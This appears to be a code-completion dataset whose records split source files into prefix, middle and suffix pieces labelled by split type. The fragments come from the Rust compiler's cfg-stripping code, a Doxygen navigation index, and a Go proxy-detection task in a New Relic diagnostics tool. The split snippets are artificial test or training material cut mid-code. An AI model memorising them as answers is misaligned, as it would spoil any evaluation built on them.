pub fn maybe_emit_expr_attr_err(&self, attr: &ast::Attribute) {
if !self.features.map(|features| features.stmt_expr_attributes).unwrap_or(true) {
let mut err = feature_err(self.sess,
"stmt_expr_attributes",
attr.span,
GateIssue::Language,
EXPLAIN_STMT_ATTR_SYNTAX);
if attr.is_sugared_doc {
err.help("`///` is for documentation comments. For a plain comment, use `//`.");
}
err.emit();
}
}
pub fn configure_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
ast::ForeignMod {
abi: foreign_mod.abi,
items: foreign_mod.items.into_iter().filter_map(|item| self.configure(item)).collect(),
}
}
fn configure_variant_data(&mut self, vdata: ast::VariantData) -> ast::VariantData {
match vdata {
ast::VariantData::Struct(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Struct(fields.collect(), id)
}
ast::VariantData::Tuple(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Tuple(fields.collect(), id)
}
ast::VariantData::Unit(id) => ast::VariantData::Unit(id)
}
}
pub fn configure_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
match item {
ast::ItemKind::Struct(def, generics) => {
ast::ItemKind::Struct(self.configure_variant_data(def), generics)
}
ast::ItemKind::Union(def, generics) => {
ast::ItemKind::Union(self.configure_variant_data(def), generics)
}
ast::ItemKind::Enum(def, generics) => {
let variants = def.variants.into_iter().filter_map(|v| {
self.configure(v).map(|v| {
Spanned {
node: ast::Variant_ {
ident: v.node.ident,
attrs: v.node.attrs,
data: self.configure_variant_data(v.node.data),
disr_expr: v.node.disr_expr,
},
span: v.span
}
})
});
ast::ItemKind::Enum(ast::EnumDef {
variants: variants.collect(),
}, generics)
}
item => item,
}
}
pub fn configure_expr_kind(&mut self, expr_kind: ast::ExprKind) -> ast::ExprKind {
match expr_kind {
ast::ExprKind::Match(m, arms) => {
let arms = arms.into_iter().filter_map(|a| self.configure(a)).collect();
ast::ExprKind::Match(m, arms)
}
ast::ExprKind::Struct(path, fields, base) => {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
ast::ExprKind::Struct(path, fields, base)
}
_ => expr_kind,
}
}
pub fn configure_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
self.visit_expr_attrs(expr.attrs());
// If an expr is valid to cfg away it will have been removed by the
// outer stmt or expression folder before descending in here.
// Anything else is always required, and thus has to error out
// in case of a cfg attr.
//
// NB: This is intentionally not part of the fold_expr() function
// in order for fold_opt_expr() to be able to avoid this check
if let Some(attr) = expr.attrs().iter().find(|a| is_cfg(a) || is_test_or_bench(a)) {
let msg = "removing an expression is not supported in this position";
self.sess.span_diagnostic.span_err(attr.span, msg);
}
self.process_cfg_attrs(expr)
}
pub fn configure_stmt(&mut self, stmt: ast::Stmt) -> Option<ast::Stmt> {
self.configure(stmt)
}
pub fn configure_struct_expr_field(&mut self, field: ast::Field) -> Option<ast::Field> {
self.configure(field)
}
pub fn configure_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
pattern.map(|mut pattern| {
if let ast::PatKind::Struct(path, fields, etc) = pattern.node {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
pattern.node = ast::PatKind::Struct(path, fields, etc);
}
pattern
})
}
// deny #[cfg] on generic parameters until we decide what to do with it.
// see issue #51279.
pub fn disallow_cfg_on_generic_param(&mut self, param: &ast::GenericParam) {
for attr in param.attrs() {
let offending_attr = if attr.check_name("cfg") {
"cfg"
} else if attr.check_name("cfg_attr") {
"cfg_attr"
} else {
continue;
};
let msg = format!("#[{}] cannot be applied on a generic parameter", offending_attr);
self.sess.span_diagnostic.span_err(attr.span, &msg);
}
}
}
impl<'a> fold::Folder for StripUnconfigured<'a> {
fn fold_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
let foreign_mod = self.configure_foreign_mod(foreign_mod);
fold::noop_fold_foreign_mod(foreign_mod, self)
}
fn fold_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
let item = self.configure_item_kind(item);
fold::noop_fold_item_kind(item, self)
}
fn fold_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
let mut expr = self.configure_expr(expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
P(fold::noop_fold_expr(expr, self))
}
fn fold_opt_expr(&mut self, expr: P<ast::Expr>) -> Option<P<ast::Expr>> {
let mut expr = configure!(self, expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
Some(P(fold::noop_fold_expr(expr, self)))
}
fn fold_stmt(&mut self, stmt: ast::Stmt) -> SmallVector<ast::Stmt> {
match self.configure_stmt(stmt) {
Some(stmt) => fold::noop_fold_stmt(stmt, self),
None => return SmallVector::new(),
}
}
fn fold_item(&mut self, item: P<ast::Item>) -> SmallVector<P<ast::Item>> {
fold::noop_fold_item(configure!(self, item), self)
}
fn fold_impl_item(&mut self, item: ast::ImplItem) -> SmallVector<ast::ImplItem> {
fold::noop_fold_impl_item(configure!(self, item), self)
}
fn fold_trait_item(&mut self, item: ast::TraitItem) -> SmallVector<ast::TraitItem> {
fold::noop_fold_trait_item(configure!(self, item), self)
}
fn fold_mac(&mut self, mac: ast::Mac) -> ast::Mac {
// Don't configure interpolated AST (c.f. #34171).
// Interpolated AST will get configured once the surrounding tokens are parsed.
mac
}
fn fold_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
fold::noop_fold_pat(self.configure_pat(pattern), self)
}
}
fn is_cfg(attr: &ast::Attribute) -> bool
|
{
attr.check_name("cfg")
}
|
identifier_body
|
|
config.rs
|
::OpenDelim(token::Paren))?;
let cfg = parser.parse_meta_item()?;
parser.expect(&token::Comma)?;
let lo = parser.span.lo();
let (path, tokens) = parser.parse_path_and_tokens()?;
parser.expect(&token::CloseDelim(token::Paren))?;
Ok((cfg, path, tokens, parser.prev_span.with_lo(lo)))
}) {
Ok(result) => result,
Err(mut e) => {
e.emit();
return None;
}
};
if attr::cfg_matches(&cfg, self.sess, self.features) {
self.process_cfg_attr(ast::Attribute {
id: attr::mk_attr_id(),
style: attr.style,
path,
tokens,
is_sugared_doc: false,
span,
})
} else {
None
}
}
// Determine if a node with the given attributes should be included in this configuration.
pub fn in_cfg(&mut self, attrs: &[ast::Attribute]) -> bool {
attrs.iter().all(|attr| {
// When not compiling with --test we should not compile the #[test] functions
if !self.should_test && is_test_or_bench(attr) {
return false;
}
let mis = if !is_cfg(attr) {
return true;
} else if let Some(mis) = attr.meta_item_list() {
mis
} else {
return true;
};
if mis.len() != 1 {
self.sess.span_diagnostic.span_err(attr.span, "expected 1 cfg-pattern");
return true;
}
if !mis[0].is_meta_item() {
self.sess.span_diagnostic.span_err(mis[0].span, "unexpected literal");
return true;
}
attr::cfg_matches(mis[0].meta_item().unwrap(), self.sess, self.features)
})
}
// Visit attributes on expression and statements (but not attributes on items in blocks).
fn visit_expr_attrs(&mut self, attrs: &[ast::Attribute]) {
// flag the offending attributes
for attr in attrs.iter() {
self.maybe_emit_expr_attr_err(attr);
}
}
/// If attributes are not allowed on expressions, emit an error for `attr`
pub fn maybe_emit_expr_attr_err(&self, attr: &ast::Attribute) {
if !self.features.map(|features| features.stmt_expr_attributes).unwrap_or(true) {
let mut err = feature_err(self.sess,
"stmt_expr_attributes",
attr.span,
GateIssue::Language,
EXPLAIN_STMT_ATTR_SYNTAX);
if attr.is_sugared_doc {
err.help("`///` is for documentation comments. For a plain comment, use `//`.");
}
err.emit();
}
}
pub fn configure_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
ast::ForeignMod {
abi: foreign_mod.abi,
items: foreign_mod.items.into_iter().filter_map(|item| self.configure(item)).collect(),
}
}
fn configure_variant_data(&mut self, vdata: ast::VariantData) -> ast::VariantData {
match vdata {
ast::VariantData::Struct(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Struct(fields.collect(), id)
}
ast::VariantData::Tuple(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Tuple(fields.collect(), id)
}
ast::VariantData::Unit(id) => ast::VariantData::Unit(id)
}
}
pub fn configure_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
match item {
ast::ItemKind::Struct(def, generics) => {
ast::ItemKind::Struct(self.configure_variant_data(def), generics)
}
ast::ItemKind::Union(def, generics) => {
ast::ItemKind::Union(self.configure_variant_data(def), generics)
}
ast::ItemKind::Enum(def, generics) => {
let variants = def.variants.into_iter().filter_map(|v| {
self.configure(v).map(|v| {
Spanned {
node: ast::Variant_ {
ident: v.node.ident,
attrs: v.node.attrs,
data: self.configure_variant_data(v.node.data),
disr_expr: v.node.disr_expr,
},
span: v.span
}
})
});
ast::ItemKind::Enum(ast::EnumDef {
variants: variants.collect(),
}, generics)
}
item => item,
}
}
pub fn configure_expr_kind(&mut self, expr_kind: ast::ExprKind) -> ast::ExprKind {
match expr_kind {
ast::ExprKind::Match(m, arms) => {
let arms = arms.into_iter().filter_map(|a| self.configure(a)).collect();
ast::ExprKind::Match(m, arms)
}
ast::ExprKind::Struct(path, fields, base) => {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
ast::ExprKind::Struct(path, fields, base)
}
_ => expr_kind,
}
}
pub fn configure_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
self.visit_expr_attrs(expr.attrs());
// If an expr is valid to cfg away it will have been removed by the
// outer stmt or expression folder before descending in here.
// Anything else is always required, and thus has to error out
// in case of a cfg attr.
//
// NB: This is intentionally not part of the fold_expr() function
// in order for fold_opt_expr() to be able to avoid this check
if let Some(attr) = expr.attrs().iter().find(|a| is_cfg(a) || is_test_or_bench(a)) {
let msg = "removing an expression is not supported in this position";
self.sess.span_diagnostic.span_err(attr.span, msg);
}
self.process_cfg_attrs(expr)
}
pub fn configure_stmt(&mut self, stmt: ast::Stmt) -> Option<ast::Stmt> {
self.configure(stmt)
}
pub fn configure_struct_expr_field(&mut self, field: ast::Field) -> Option<ast::Field> {
self.configure(field)
}
pub fn configure_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
pattern.map(|mut pattern| {
if let ast::PatKind::Struct(path, fields, etc) = pattern.node {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
pattern.node = ast::PatKind::Struct(path, fields, etc);
}
pattern
})
}
// deny #[cfg] on generic parameters until we decide what to do with it.
// see issue #51279.
pub fn disallow_cfg_on_generic_param(&mut self, param: &ast::GenericParam) {
for attr in param.attrs() {
let offending_attr = if attr.check_name("cfg") {
"cfg"
} else if attr.check_name("cfg_attr") {
"cfg_attr"
} else {
continue;
};
let msg = format!("#[{}] cannot be applied on a generic parameter", offending_attr);
self.sess.span_diagnostic.span_err(attr.span, &msg);
}
}
}
impl<'a> fold::Folder for StripUnconfigured<'a> {
fn fold_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
let foreign_mod = self.configure_foreign_mod(foreign_mod);
fold::noop_fold_foreign_mod(foreign_mod, self)
}
fn fold_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
let item = self.configure_item_kind(item);
fold::noop_fold_item_kind(item, self)
}
fn fold_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
let mut expr = self.configure_expr(expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
P(fold::noop_fold_expr(expr, self))
}
fn fold_opt_expr(&mut self, expr: P<ast::Expr>) -> Option<P<ast::Expr>> {
let mut expr = configure!(self, expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
Some(P(fold::noop_fold_expr(expr, self)))
}
fn fold_stmt(&mut self, stmt: ast::Stmt) -> SmallVector<ast::Stmt> {
match self.configure_stmt(stmt) {
Some(stmt) => fold::noop_fold_stmt(stmt, self),
None => return SmallVector::new(),
}
}
fn fold_item(&mut self, item: P<ast::Item>) -> SmallVector<P<ast::Item>> {
fold::noop_fold_item(configure!(self, item), self)
}
fn fold_impl_item(&mut self, item: ast::ImplItem) -> SmallVector<ast::ImplItem> {
fold::noop_fold_impl_item(configure!(self, item), self)
}
fn
|
fold_trait_item
|
identifier_name
|
|
config.rs
|
rate, sess: &ParseSess, should_test: bool, edition: Edition)
-> (ast::Crate, Features) {
let features;
{
let mut strip_unconfigured = StripUnconfigured {
should_test,
sess,
features: None,
};
let unconfigured_attrs = krate.attrs.clone();
let err_count = sess.span_diagnostic.err_count();
if let Some(attrs) = strip_unconfigured.configure(krate.attrs) {
krate.attrs = attrs;
} else { // the entire crate is unconfigured
krate.attrs = Vec::new();
krate.module.items = Vec::new();
return (krate, Features::new());
}
features = get_features(&sess.span_diagnostic, &krate.attrs, edition);
// Avoid reconfiguring malformed `cfg_attr`s
if err_count == sess.span_diagnostic.err_count() {
strip_unconfigured.features = Some(&features);
strip_unconfigured.configure(unconfigured_attrs);
}
}
(krate, features)
}
macro_rules! configure {
($this:ident, $node:ident) => {
match $this.configure($node) {
Some(node) => node,
None => return Default::default(),
}
}
}
impl<'a> StripUnconfigured<'a> {
pub fn configure<T: HasAttrs>(&mut self, node: T) -> Option<T> {
let node = self.process_cfg_attrs(node);
if self.in_cfg(node.attrs()) { Some(node) } else { None }
}
pub fn process_cfg_attrs<T: HasAttrs>(&mut self, node: T) -> T {
node.map_attrs(|attrs| {
attrs.into_iter().filter_map(|attr| self.process_cfg_attr(attr)).collect()
})
}
fn process_cfg_attr(&mut self, attr: ast::Attribute) -> Option<ast::Attribute> {
if !attr.check_name("cfg_attr") {
return Some(attr);
}
let (cfg, path, tokens, span) = match attr.parse(self.sess, |parser| {
parser.expect(&token::OpenDelim(token::Paren))?;
let cfg = parser.parse_meta_item()?;
parser.expect(&token::Comma)?;
let lo = parser.span.lo();
let (path, tokens) = parser.parse_path_and_tokens()?;
parser.expect(&token::CloseDelim(token::Paren))?;
Ok((cfg, path, tokens, parser.prev_span.with_lo(lo)))
}) {
Ok(result) => result,
Err(mut e) => {
e.emit();
return None;
}
};
if attr::cfg_matches(&cfg, self.sess, self.features) {
self.process_cfg_attr(ast::Attribute {
id: attr::mk_attr_id(),
style: attr.style,
path,
tokens,
is_sugared_doc: false,
span,
})
} else {
None
}
}
// Determine if a node with the given attributes should be included in this configuration.
pub fn in_cfg(&mut self, attrs: &[ast::Attribute]) -> bool {
attrs.iter().all(|attr| {
// When not compiling with --test we should not compile the #[test] functions
if !self.should_test && is_test_or_bench(attr) {
return false;
}
let mis = if !is_cfg(attr) {
return true;
} else if let Some(mis) = attr.meta_item_list() {
mis
} else {
return true;
};
if mis.len() != 1 {
self.sess.span_diagnostic.span_err(attr.span, "expected 1 cfg-pattern");
return true;
}
if !mis[0].is_meta_item() {
self.sess.span_diagnostic.span_err(mis[0].span, "unexpected literal");
return true;
}
attr::cfg_matches(mis[0].meta_item().unwrap(), self.sess, self.features)
})
}
// Visit attributes on expression and statements (but not attributes on items in blocks).
fn visit_expr_attrs(&mut self, attrs: &[ast::Attribute]) {
// flag the offending attributes
for attr in attrs.iter() {
self.maybe_emit_expr_attr_err(attr);
}
}
/// If attributes are not allowed on expressions, emit an error for `attr`
pub fn maybe_emit_expr_attr_err(&self, attr: &ast::Attribute) {
if !self.features.map(|features| features.stmt_expr_attributes).unwrap_or(true) {
let mut err = feature_err(self.sess,
"stmt_expr_attributes",
attr.span,
GateIssue::Language,
EXPLAIN_STMT_ATTR_SYNTAX);
if attr.is_sugared_doc {
err.help("`///` is for documentation comments. For a plain comment, use `//`.");
}
err.emit();
}
|
pub fn configure_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
ast::ForeignMod {
abi: foreign_mod.abi,
items: foreign_mod.items.into_iter().filter_map(|item| self.configure(item)).collect(),
}
}
fn configure_variant_data(&mut self, vdata: ast::VariantData) -> ast::VariantData {
match vdata {
ast::VariantData::Struct(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Struct(fields.collect(), id)
}
ast::VariantData::Tuple(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Tuple(fields.collect(), id)
}
ast::VariantData::Unit(id) => ast::VariantData::Unit(id)
}
}
pub fn configure_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
match item {
ast::ItemKind::Struct(def, generics) => {
ast::ItemKind::Struct(self.configure_variant_data(def), generics)
}
ast::ItemKind::Union(def, generics) => {
ast::ItemKind::Union(self.configure_variant_data(def), generics)
}
ast::ItemKind::Enum(def, generics) => {
let variants = def.variants.into_iter().filter_map(|v| {
self.configure(v).map(|v| {
Spanned {
node: ast::Variant_ {
ident: v.node.ident,
attrs: v.node.attrs,
data: self.configure_variant_data(v.node.data),
disr_expr: v.node.disr_expr,
},
span: v.span
}
})
});
ast::ItemKind::Enum(ast::EnumDef {
variants: variants.collect(),
}, generics)
}
item => item,
}
}
pub fn configure_expr_kind(&mut self, expr_kind: ast::ExprKind) -> ast::ExprKind {
match expr_kind {
ast::ExprKind::Match(m, arms) => {
let arms = arms.into_iter().filter_map(|a| self.configure(a)).collect();
ast::ExprKind::Match(m, arms)
}
ast::ExprKind::Struct(path, fields, base) => {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
ast::ExprKind::Struct(path, fields, base)
}
_ => expr_kind,
}
}
pub fn configure_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
self.visit_expr_attrs(expr.attrs());
// If an expr is valid to cfg away it will have been removed by the
// outer stmt or expression folder before descending in here.
// Anything else is always required, and thus has to error out
// in case of a cfg attr.
//
// NB: This is intentionally not part of the fold_expr() function
// in order for fold_opt_expr() to be able to avoid this check
if let Some(attr) = expr.attrs().iter().find(|a| is_cfg(a) || is_test_or_bench(a)) {
let msg = "removing an expression is not supported in this position";
self.sess.span_diagnostic.span_err(attr.span, msg);
}
self.process_cfg_attrs(expr)
}
pub fn configure_stmt(&mut self, stmt: ast::Stmt) -> Option<ast::Stmt> {
self.configure(stmt)
}
pub fn configure_struct_expr_field(&mut self, field: ast::Field) -> Option<ast::Field> {
self.configure(field)
}
pub fn configure_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
pattern.map(|mut pattern| {
if let ast::PatKind::Struct(path, fields, etc) = pattern.node {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
pattern.node = ast::PatKind::Struct(path, fields, etc);
}
pattern
})
}
// deny #[cfg] on generic parameters until we decide what to do with it.
// see issue #51279.
pub fn disallow_cfg_on_generic_param(&mut self, param: &ast::GenericParam) {
for attr in param.attrs() {
let offending_attr = if attr.check_name("cfg") {
"cfg"
} else if attr.check
|
}
|
random_line_split
|
navtreeindex32.js
|
2027acb372a1300":[2,0,367,1,8],
"struct_ui_transform_interface_1_1_rect_points.html#a15903c70e62a24d7a1191e8d75a8f779":[2,0,367,1,2],
"struct_ui_transform_interface_1_1_rect_points.html#a19297746a907c54dd19d40177567e7ae":[2,0,367,1,4],
"struct_ui_transform_interface_1_1_rect_points.html#a483b7c8841920a46241bd6192a6d4288":[2,0,367,1,12],
"struct_ui_transform_interface_1_1_rect_points.html#a5d00fffdb89e1b47eb8614af06feb9de":[2,0,367,1,18],
"struct_ui_transform_interface_1_1_rect_points.html#a5dfc5d9bb084be608ee2119de27a16ba":[2,0,367,1,5],
"struct_ui_transform_interface_1_1_rect_points.html#a6246af650e6c70630fa380f26792a456":[2,0,367,1,11],
"struct_ui_transform_interface_1_1_rect_points.html#a71438e1e0b31c8bb5706f052d8f9aa35":[2,0,367,1,16],
"struct_ui_transform_interface_1_1_rect_points.html#a889c677998aede93e755b73b8540ece7":[2,0,367,1,1],
"struct_ui_transform_interface_1_1_rect_points.html#a957bfb7b19a01aecece49ea810fb69a3":[2,0,367,1,7],
"struct_ui_transform_interface_1_1_rect_points.html#a99e7404d4a1c65687d1b77fe85a670a6":[2,0,367,1,10],
"struct_ui_transform_interface_1_1_rect_points.html#a9f086e5a232896db8b87eb6c2c676f57":[2,0,367,1,19],
"struct_ui_transform_interface_1_1_rect_points.html#aaa0b5e92d4c48d8bde7085a67f0d3b46":[2,0,367,1,9],
"struct_ui_transform_interface_1_1_rect_points.html#ab119ef9afd6289c2aae7f42ddcb961d0":[2,0,367,1,17],
"struct_ui_transform_interface_1_1_rect_points.html#ab58c94a9b801ea7653b89b04ad7ec444":[2,0,367,1,3],
"struct_ui_transform_interface_1_1_rect_points.html#abe4ef3ccec657670c92a8128dea7ab13":[2,0,367,1,13],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eb":[2,0,367,1,0],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba10312e668115d6f3d93629c7193349cf":[2,0,367,1,0,0],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba39d10d4d2f233ac9d277f1091054ebad":[2,0,367,1,0,4],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba5d176e03edb82e7d517427bfb6437dc3":[2,0,367,1,0,1],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba63a41eb635d9615d24d4d8363eac8f2c":[2,0,367,1,0,2],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba684aca726a78b13689966c6c26f25a8c":[2,0,367,1,0,3],
"struct_ui_transform_interface_1_1_rect_points.html#ac336e6a46e84efc8cb1ddb5b80b3e49c":[2,0,367,1,6],
"struct_ui_transform_interface_1_1_rect_points.html#acbee867e100de8231099e4c0fe36fbc9":[2,0,367,1,20],
"struct_ui_transform_interface_1_1_rect_points.html#ad8ae2a7c4af18fa4378653ea1dfb3862":[2,0,367,1,14],
"struct_ui_transform_interface_1_1_rect_points.html#aff037ac21137c798f7212ee51d6a12f8":[2,0,367,1,15],
"struct_viewport_helpers_1_1_element_edges.html":[2,0,9,0],
"struct_viewport_helpers_1_1_element_edges.html#a06de4fbb1bd596459a5c0d3fee269d2c":[2,0,9,0,3],
"struct_viewport_helpers_1_1_element_edges.html#a5ed9ca612a7669d8b04778a8502b3184":[2,0,9,0,13],
"struct_viewport_helpers_1_1_element_edges.html#a6313feab9e59a2c95b6f13b0ce94deb0":[2,0,9,0,11],
"struct_viewport_helpers_1_1_element_edges.html#a7a75bd32f68d05198f87de8c55e84f6a":[2,0,9,0,5],
"struct_viewport_helpers_1_1_element_edges.html#a827113a03cc9cdc2fc45feb7c9a9d021":[2,0,9,0,9],
"struct_viewport_helpers_1_1_element_edges.html#a827f9612276519467a11709900674f87":[2,0,9,0,2],
"struct_viewport_helpers_1_1_element_edges.html#a96f7d151ad93130428fd7a42033d44b4":[2,0,9,0,6],
|
"struct_viewport_helpers_1_1_element_edges.html#a972c7643a8ed0c49d05c0b789322338b":[2,0,9,0,7],
"struct_viewport_helpers_1_1_element_edges.html#a98be7c1a5536e868337c72dce24c59d4":[2,0,9,0,12],
"struct_viewport_helpers_1_1_element_edges.html#aa258e044d2dd1fa6fc74b11242953918":[2,0,9,0,0],
|
random_line_split
|
|
proxyDetect.go
|
config file
}
// minion has combined auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - No dependencies since this is generally one of the first tasks to run
func (p BaseConfigProxyDetect) Dependencies() []string {
// no dependencies!
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect) Execute(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this is env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have succesfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for you app and it is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string)
|
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there or to at least find out which agent are we dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precendence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precendence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and they ovewrite other proxy settings
if proxy.proxyURL != "" {
return proxy.proxyURL
}
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will preprend a protocol to their host configuration. So want to avoid building a url such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
